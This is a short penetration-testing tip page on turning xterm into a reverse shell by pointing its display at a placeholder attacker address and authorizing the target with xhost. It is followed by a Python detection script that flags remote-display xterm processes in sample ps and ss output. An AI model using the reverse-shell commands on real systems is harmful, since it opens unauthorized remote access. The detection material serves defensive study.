Exploiting Xterm

Remember that the X11 protocol is network based! You can thus get xterm to act as a reverse shell by simply providing it with a display pointing to your machine.

xterm -display $ATTACKER_IP:$DISPLAY_NUM

The connection will be made back on port 6000 + $DISPLAY_NUM (so, 6000 for display 0, 6001 for display 1, etc.).

This, of course, requires a running X server on your end (for example, Xnest :1). You’ll need to make sure that connections from the target system are authorized.

xhost +$TARGET_IP
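As a defender-side complement to the technique above, here is an added example (not part of the original page) that scans ps-style process lines for xterm invocations whose -display points at a non-local host, derives the expected outbound port (6000 + display number, as stated above) and cross-checks it against ss-style socket lines. The process and socket lines are constructed sample data, and 203.0.113.5 is a documentation-range placeholder address, not a real indicator.

```python
import ipaddress
import os
import re
from dataclasses import dataclass

# Constructed sample output in the shape of `ps -eo pid,user,args` (not real data).
SAMPLE_PS = """\
  PID USER     COMMAND
 1201 alice    xterm -geometry 80x24
 1337 www-data xterm -display 203.0.113.5:1
 1402 bob      /usr/bin/xterm -display :0
 1500 root     /usr/sbin/sshd -D
 1601 alice    xterm -display localhost:0
"""

# Constructed sample output in the shape of `ss -tn` (not real data).
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port    Peer Address:Port
ESTAB  0      0      10.0.0.7:41522        203.0.113.5:6001
ESTAB  0      0      10.0.0.7:22           10.0.0.3:55110
"""

# Matches "-display host:N" (an optional ".screen" suffix is ignored).
DISPLAY_RE = re.compile(r"(?:^|\s)-display\s+(?P<host>[^:\s]*):(?P<num>\d+)")

# Hosts that mean "this machine" in a DISPLAY string.
LOCAL_HOSTS = {"", "localhost", "unix"}


@dataclass
class Finding:
    pid: int
    user: str
    host: str
    display: int
    port: int        # expected outbound TCP port: 6000 + display number
    cmdline: str


def display_port(display_num: int) -> int:
    """X11 TCP port for a given display number."""
    return 6000 + display_num


def is_local_host(host: str) -> bool:
    """True if the display host names the local machine."""
    if host in LOCAL_HOSTS:
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        return False  # a hostname we cannot classify is treated as remote


def find_remote_xterm(ps_output: str) -> list:
    """Return xterm processes whose -display points at a non-local host."""
    findings = []
    for line in ps_output.splitlines():
        parts = line.split(None, 2)
        if len(parts) < 3 or not parts[0].isdigit():
            continue  # header line or malformed row
        pid, user, cmd = parts
        if os.path.basename(cmd.split()[0]) != "xterm":
            continue
        m = DISPLAY_RE.search(cmd)
        if m is None or is_local_host(m.group("host")):
            continue
        num = int(m.group("num"))
        findings.append(Finding(int(pid), user, m.group("host"), num,
                                display_port(num), cmd))
    return findings


def confirmed_connections(findings: list, ss_output: str) -> list:
    """Keep only findings with a live socket to host:port in ss-style output."""
    peers = set()
    for line in ss_output.splitlines():
        cols = line.split()
        if len(cols) >= 5 and cols[0] != "State":
            peers.add(cols[4])  # "Peer Address:Port" column
    return [f for f in findings if f"{f.host}:{f.port}" in peers]


if __name__ == "__main__":
    hits = find_remote_xterm(SAMPLE_PS)
    for f in confirmed_connections(hits, SAMPLE_SS):
        print(f"pid={f.pid} user={f.user} xterm display -> {f.host}:{f.display} "
              f"(expect TCP {f.port}): {f.cmdline}")
```

In practice the two inputs would come from `ps -eo pid,user,args` and `ss -tn` (or from EDR process and network telemetry); the port derivation is the same 6000 + N rule the page describes, so a process hit with a matching established peer is strong evidence of a remote display in use.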